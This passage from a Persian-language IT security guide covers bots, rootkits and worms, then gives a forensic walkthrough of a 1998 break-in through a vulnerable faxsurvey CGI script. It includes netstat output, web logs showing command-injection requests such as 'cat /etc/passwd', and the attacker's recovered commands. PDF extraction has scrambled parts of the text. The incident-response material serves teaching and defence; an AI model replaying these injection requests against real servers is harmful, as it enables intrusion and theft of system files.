ﻻ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﻭﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭘﺨـﺶﺷـﺪﻩ ﺩﺭ ﺷـﺒﻜﻪ Botﻫﺎ )ﻣﺨﻔﻒ robotﻫﺎ( ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪBot .ﻫﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺭ ﻭ ﻫﺪﺍﻳﺖ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷـﺪﺓ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﻭﻱ ﻛﺎﻧﺎﻟﻬـﺎﻱ
ﺗﻘﻮﻳﺖ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺑﺎﺷﻨﺪBot .ﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻳﺎ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗـﺎ
ﺭﻭﺯﻫﺎ ،ﻫﻔﺘﻪﻫﺎ ،ﻭ ﻳﺎ ﻣﺎﻫﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺑﮑﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ .ﺍﺯ botﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﮐﺎﺭﻫﺎﻱ ﺧﻮﺩﮐﺎﺭ ﻧﻴﺰ ﺑﻬﺮﻩ ﺑﺮﺩ.
Rootkitﻫﺎ
rootkitﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺭﺍ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﻪ ﻣـﻲﺩﻫـﺪ،
ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﺭ ﻣﻲﮔﺬﺍﺭﺩ ،ﻭ ﻫﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺣﻀﻮﺭ ﻣﻬﺎﺟﻢ ﺭﺍ ﭘﺎﻙ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺍﺑﺘﺪﺍ rootkitﻫﺎ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ Unix
ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ )ﻭ ﻧﺎﻡ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﻧﻴﺰ ﺍﺯ ﻫﻤﻴﻨﺠﺎ ﺁﻣـﺪﻩ( ،ﻭﻟﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ windowsﻫﻢ ﺗﻮﻟﻴـﺪ ﺷـﺪﻩﺍﻧـﺪ .ﻳـﻚ rootkit
ﻧﻮﻋﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ .ﻫﻤﻴﻨﻜﻪ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮ ﺳـﻄﺢ ﺑـﺎﻻ
ﺑﺪﺳﺖ ﺁﻣﺪ rootkit ،ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻛﻪ ﻳﻚ ﺩﺭﺏ ﻣﺨﻔﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﺷﻮﺩ .ﺁﻧﮕﺎﻩ ﻫﺴﺘﺔ ﺍﺻﻠﻲ
ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﺮ ﺗﻼﺵ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﺑﺠﺎﻱ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻣﻘﺪﺍﺭ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ؛ ﻓﺮﺍﻣﻴﻦ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻛﻪ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻧﻴﺎﻳﻨﺪ؛ ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ rootkitﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻨﺞ
ﺩﻗﻴﻘﻪ ﺍﻧﺘﻬﺎﻳﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺍﺯ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺣﺬﻑ ﻛﻨﺪ.
٤٣
ﻛﺮﻣﻬﺎ
ﻛﺮﻣﻬﺎ ﻛﻪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻳﺎ ﺍﺟﺰﺍﻱ ﺷﺒﻜﻪﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﺭﻭﺵ ﺭﺍﻳﺠﻲ
ﺑﺮﺍﻱ ﺧﺪﺷﻪ ﺩﺍﺭ ﻛﺮﺩﻥ ﺁﻧﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺷﺪﻩﺍﻧﺪ.
43 Worms
٢٧١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
44 Patches
45 Process
46 Shell
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٧٢
. ﻳﻚ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﺍﺯ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺗﻬﻴﻪ ﻛﻨﻴﺪUnix ﺩﺭgcore ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ .۴
. ﻧﻔﻮﺫﮔﺮ ﺗﻌﺮﻳﻒ ﻧﻤﺎﻳﻴﺪISP ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻣﺒﺪﺃISP ﻳﻚ ﺿﺎﺑﻄﻪ ﺩﺭ ﻣﺴﻴﺮﻳﺎﺏ .۵
ﻛﺎﻣ ﹰkill -9 ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ
.ﻼ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﻳﺪ .۶
.ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻧﻔﻮﺫﮔﺮ ﭼﮕﻮﻧﻪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﻔﺮﺓ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺭﺍ ﺍﺻﻼﺡ ﻛﻨﻴﺪ .۷
.ﻣﺠﺮﻳﺎﻥ ﻗﻀﺎﻳﻲ ﺭﺍ ﻣﻄﻠﻊ ﺳﺎﺯﻳﺪ .۸
ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺟﺪﻳـﺪﻱ ﺑﺪﺳـﺖ. ﺍﻳﻦ ﻛﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪnetstat ﺳﻌﻲ ﻛﺮﺩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥISP ،ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻧﻔﻮﺫﮔﺮ
( ﺑـﻪApache.Vineyard.NET) ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏX11 ﺑﻠﻜﻪ ﻳﻚ ﺍﺗﺼﺎﻝ، ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﺸﺪﻩ ﺑﻮﺩSSH ﻳﺎtelnet ﻧﻔﻮﺫﮔﺮ ﺑﺎ.ﺁﻣﺪ
. ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺍﺟﺮﺍ ﻣﻲﺷﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺖX ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD
tcp 0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD
tcp 0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED
tcp 0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED
tcp 0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp 0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED
tcp 0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED
tcp 0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED
tcp 0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2
tcp 0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED
tcp 0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED
tcp 0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED
tcp 0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT
tcp 0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp 8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.4778 *.* LISTEN
tcp 0 0 LOCALHOST.VINEYA.domai *.* LISTEN
tcp 0 0 NET10.VINEYARD.N.domai *.* LISTEN
tcp 0 0 SMTP4.VINEYARD.N.domai *.* LISTEN
٢٧٣ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ:ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻪ ﺩﺳـﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭxterm ﺑﺮﺍﻱ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚCGI ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪISP
: ﺍﻧﺠﺎﻡ ﺷﺪISP ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﺳﺮﻳﻊ ﺩﺭ ﻣﻴﺎﻥ ﺛﺒﺘﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ، ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻳﻦ ﻓﺮﺿﻴﻪ.ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] “GET /cgi-bin/
faxsurvey?cat%20/etc/passwd
HTTP/1.1” 200 79467 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] “GET /cgi-bin/ faxsurvey?ls%20-
lFa%20/usr/
HTTP/1.1” 200 1701 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] “GET /cgi-bin/ faxsurvey?id
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] “GET /cgi-bin/ faxsurvey?pwd
HTTP/1.1” 200
305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] “GET /cgi-bin/
faxsurvey?/bin/pwd HTTP/1.1”
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٧٤
”200 305 “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/web.vineyard.net
16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] “GET /cgi-bin/ faxsurvey?ls%20-
”lFa HTTP/1.1
”200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net
17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] “GET /cgi-bin/ faxsurvey?ls%20-
”)lFa%20../conf/ HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98
”“/htdocs/web.vineyard.net
ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺳﻄﺮﻫﺎﻱ ۱ﺗﺎ ۷ﺑﺎ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺍﺧﺘﻼﻑ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺭﺥ ﺩﺍﺩﻩﺍﻧـﺪ .ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺍﺑـﺰﺍﺭ ﺍﺗﻮﻣﺎﺗﻴـﻚ ﻛـﻪ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ CGIﺭﺍ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺩﺭ ﺳﻄﺮﻫﺎﻱ ۸ﺗﺎ ،۱۷ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ
faxsurveyﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ .ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﺮﻳﺐ ﺑﻪ ﻳﻘﻴﻦ ﺑﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺘﻔﺎﻭﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ .ﻳﻚ ﺩﻟﻴـﻞ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﻧﺴﺨﺔ ﭘﺮﻭﺗﻜﻞ HTTPﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﺮﺩﻩ ﺍﺯ " "HTTP/1.0ﺑﻪ " " HTTP/1.1ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺍﺳﺖ.
ﻓﺎﻳﻞ ﺛﺒﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺁﺷﻜﺎﺭ ﻛﺮﺩ ﻛﻪ ﺍﺳﻢ ﻛﺎﻣﻞ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ krldb110-06.splitrock.netﺑﻮﺩﻩ ﺍﺳـﺖ .ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻓﺮﻣﺎﻥ ،hostﺍﻳﻦ ﺁﺩﺭﺱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺁﺩﺭﺱ IPﻭﺍﻗﻌﻲ ﺗﺮﺟﻤﻪ ﺷﻮﺩ:
apache: {43} % host krldb110-06.splitrock.net
krldb110-06.splitrock.net has address 209.156.113.121
apache: {44} %
ﺑﺎ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻓﺎﻳﻞ ﺛﺒﺖ ،ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ /cgi-bin/faxsurveyﻧﻘﺼﻲ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻓـﺮﺍﻣﻴﻦ
ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻪ ﭼﻪ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺑﻮﺩ ﻣﻬﺎﺟﻢ ﺑﺎ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺭﺳﺎﻝ URLﻫﺎ ﺑﺎ ﺁﺭﮔﻮﻣﺎﻥﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺑﭙﺮﺩﺍﺯﺩ؟(.
ﺍﮔﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺻﺤﺖ ﻣﻲﺩﺍﺷﺖ ،ﺁﻧﮕﺎﻩ ﻓﺮﺍﻣﻴﻦ ﺯﻳﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ:
ls -lFa
ls -lFa
uname -a
id
cat /etc/passwd
ls -lFa /usr/
id
pwd
/bin/pwd
ls -lFa
ls -lFa../conf/
ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﺷﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻬﺎﺟﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻓﺮﺍﻣﻴﻦ ﺑﻪ ﺍﺟﺮﺍﻱ ﻓﺮﻣﺎﻥ xtermﺑﺮﺳﺪ ،ﺍﻣـﺎ ﺑـﻪ ﺧـﻮﺑﻲ ﺭﻭﺷـﻦ
ﺍﺳﺖ ﻛﻪ ﻓﺮﻣﺎﻥ xtermﺍﺟﺮﺍ ﺷﺪﻩ ،ﭼﻮﻥ ﺳﻄﺮ HTTPﺩﺭ ﺧﺮﻭﺟﻲ ﻓﺮﻣﺎﻥ ،wﭘﺮﺩﺍﺯﺓ xtermﺩﺭﺣﺎﻝ ﺍﺟـﺮﺍ ،ﻭ ﺳـﻄﺮ X11ﺩﺭ ﻓﺮﻣـﺎﻥ
netstatﺷﻮﺍﻫﺪﻱ ﺑﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﺴﺘﻨﺪ.
٤٧
ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ISP ،ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺟﺴﺘﺠﻮ ﻛﺮﺩ .ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺸﻜﻮﻙ ﺩﺭ ﻓﺎﻳـﻞ ﺛﺒـﺖ ﭘﻴﺎﻣﻬـﺎ
ﭘﻴﺪﺍ ﺷﺪ -ﻇﺎﻫﺮﹰﺍ ﻣﻬﺎﺟﻢ ﺗﻼﺵ ﻛﺮﺩﻩ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﻘﺺ ﺩﺭ POPﻳﺎ qpopperﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ:
* apache: {15} % grep -i krldb110-06
messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06. splitrock.net: -ERR
POP
timeout
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﺎﺑﻘﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﻬﺎﺟﻢ ،ﺁﻧﻬﺎ ﻣﺘﻮﻗﻒ ﺷﺪﻧﺪ ،ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺣﺎﻓﻈﺔ ﭘﺮﺩﺍﺯﺷﻲ ﺫﺧﻴﺮﻩ ﺷﺪ ،ﻭ ﺁﻧﮕـﺎﻩ ﭘـﺮﺩﺍﺯﻩﻫـﺎ ﺍﺯ
ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻪ ﺷﺪﻧﺪ.
ﺑﻪ ﺩﻧﺒﺎﻝ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺿﺎﺑﻄﻪ ﺑﻪ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎﻱ ISPﺍﺿـﺎﻓﻪ ﺷـﺪ ﺗـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺁﺩﺭﺳـﻬﺎﻱ IPﻣﻬـﺎﺟﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ .ﻣﺠﻮﺯﻫـﺎﻱ
ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ faxsurveyﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻨﺪ ﺗﺎ ﻫﻤﻪ ﭼﻴﺰ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﻳﻚ ﺗﺠﺴﺲ ﺁﻣﺎﺩﻩ ﺑﺎﺷﺪ .ﭼﻨـﺪ ﺭﻭﺯ
ﺑﻌﺪ ﻫﻢ ﺗﻜﻪﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺣﺬﻑ ﺷﺪ.
ISPﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺗﻲ SplitRockﺗﻤﺎﺱ ﮔﺮﻓﺖ؛ ﻫﻤﺎﻥ ISPﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺁﺩﺭﺱ IPﻣﻬﺎﺟﻢ ﺭﺍ ﻋﻬـﺪﻩﺩﺍﺭ ﺑـﻮﺩ .ﻣـﺸﺨﺺ
ﺷﺪ ﻛﻪ SplitRockﭼﻨﺪ modem poolﻛﻪ ﺑﺮﺍﻱ ISPﺩﻳﮕﺮ ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﻳﻚ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﺔ ﺍﺟﺎﺭﻩ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﺍﺳـﺖ.
ﺍﺯ SplitRockﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺩﺭ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺗﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
